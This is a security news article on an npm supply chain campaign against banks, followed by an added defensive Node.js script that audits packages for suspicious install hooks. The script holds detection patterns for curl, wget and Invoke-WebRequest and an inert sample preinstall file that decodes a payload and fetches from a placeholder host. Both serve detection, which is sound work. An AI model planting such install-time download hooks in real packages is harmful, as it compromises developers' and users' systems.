Novel Open Source Supply Chain Attacks Target Banking Sector

Application security provider Checkmarx has identified what it describes as the first open source software supply chain attack to target the banking sector.

In a recent report, Checkmarx researchers analyzed two different advanced supply chain attacks that relied on open source toolsets. The target of both attacks was a bank.

The first attacks began in February 2023, when threat actors uploaded packages to NPM, the world’s largest software registry.

These packages contained a payload designed to latch onto a specific login form element on the targeted bank’s webpage, covertly intercept the login data, and send it to a remote location.

The premise of the second attack, observed from early April 2023, was similar: the threat actor uploaded packages to NPM.

These packages contained pre-install scripts that executed malicious code upon installation.

First, the script identified the victim’s operating system (Windows, Linux, or Darwin/MacOS). Based on the result, the script then decoded the relevant encrypted files in the NPM package.

The attackers then used these files to download malicious binaries onto the victim’s system.
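As an added example (not code from the article or from the Checkmarx report), a small Node.js audit that inspects a package for install-time lifecycle scripts and, in the script they run, the three traits described above: operating-system detection, decoding of embedded data, and a download from a remote host. The package contents, trait names and the `.invalid` host are constructed for illustration.

```javascript
// Added example: audit an npm package for install-time lifecycle hooks and
// the behaviour the article describes (OS check, embedded-data decode, fetch).
// All package contents below are constructed; nothing is downloaded or run.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Heuristic traits (names are this example's own, not an industry standard).
const TRAITS = [
  { name: 'os-detection', re: /process\.platform|os\.platform\(\)|['"](win32|darwin|linux)['"]/ },
  { name: 'embedded-decode', re: /Buffer\.from\([^)]*['"]base64['"]\)|atob\(|\.decode\(/ },
  { name: 'remote-fetch', re: /https?:\/\/|\bcurl\b|\bwget\b|Invoke-WebRequest/i },
];

// pkg = { manifest: <parsed package.json>, files: { filename: source text } }
function auditPackage(pkg) {
  const scripts = pkg.manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (!scripts[hook]) continue;
    // A hook of the form "node <file>" is resolved so the file body is inspected too.
    const m = /^node\s+(\S+)/.exec(scripts[hook]);
    const body = scripts[hook] + '\n' + ((m && pkg.files[m[1]]) || '');
    const traits = TRAITS.filter(t => t.re.test(body)).map(t => t.name);
    findings.push({ hook, traits });
  }
  // Any install hook deserves review; two or more traits together is high risk.
  const risk = findings.some(f => f.traits.length >= 2) ? 'high'
             : findings.length ? 'review' : 'none';
  return { name: pkg.manifest.name, risk, findings };
}

// Constructed packages: one benign build step, one modelled on the described behaviour.
const BENIGN = {
  manifest: { name: 'example-benign', scripts: { postinstall: 'node build.js' } },
  files: { 'build.js': "console.log('building docs');" },
};
const SUSPECT = {
  manifest: { name: 'example-suspect', scripts: { preinstall: 'node setup.js' } },
  files: {
    'setup.js': [
      "const os = process.platform === 'win32' ? 'win' : 'nix';",
      "const blob = Buffer.from(PAYLOAD[os], 'base64');",
      "fetch('https://example-cdn.invalid/' + os);", // placeholder host
    ].join('\n'),
  },
};

console.log(JSON.stringify([auditPackage(BENIGN), auditPackage(SUSPECT)], null, 2));
```

Run against a real tree by loading each `node_modules/*/package.json` and the files it references; the same audit applies to a lockfile review before installation.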


To evade detection and bypass traditional deny list techniques, the attackers created subdomains on Microsoft Azure CDN that incorporated the names of the targeted banks.

The attackers also leveraged the Havoc Framework, an advanced post-exploitation command and control framework created by a self-proclaimed “malware author” operating under the Twitter handle @C5pider.

“Havoc’s ability to bypass standard defenses like Windows Defender makes it a go-to option for threat actors to replace legitimate toolkits such as Cobalt Strike, Sliver, and Brute Ratel,” the report states.

Checkmarx also noted that the contributors behind these packages were linked to personal LinkedIn profile pages posing as employees of the targeted banks.

A security researcher commented: “Our original assumption was that this may have been a penetration test by the bank. However, the response we received when we contacted the financial institution for clarification indicated a different situation. The bank was unaware of this activity.”

Although the malicious open-source package was reported and removed by Checkmarx, the company predicts that “the trend of attacks against the banking sector’s software supply chain will continue.”

The researchers argued that vulnerability scanning at the build level alone “is no longer relevant in the face of today’s advanced cyberthreats. Once a malicious open-source package enters the pipeline, it is essentially an immediate compromise, rendering further countermeasures ineffective. […] This widening gap underscores the urgency of shifting strategies from simply managing malicious packages to actively preventing them from entering the software development lifecycle (SDLC) in the first place.”

On July 12, 2023, SOCRadar found that the financial industry is facing a surge in ransomware threats, ranking seventh as the sector most targeted by ransomware attackers in the first half of 2023.
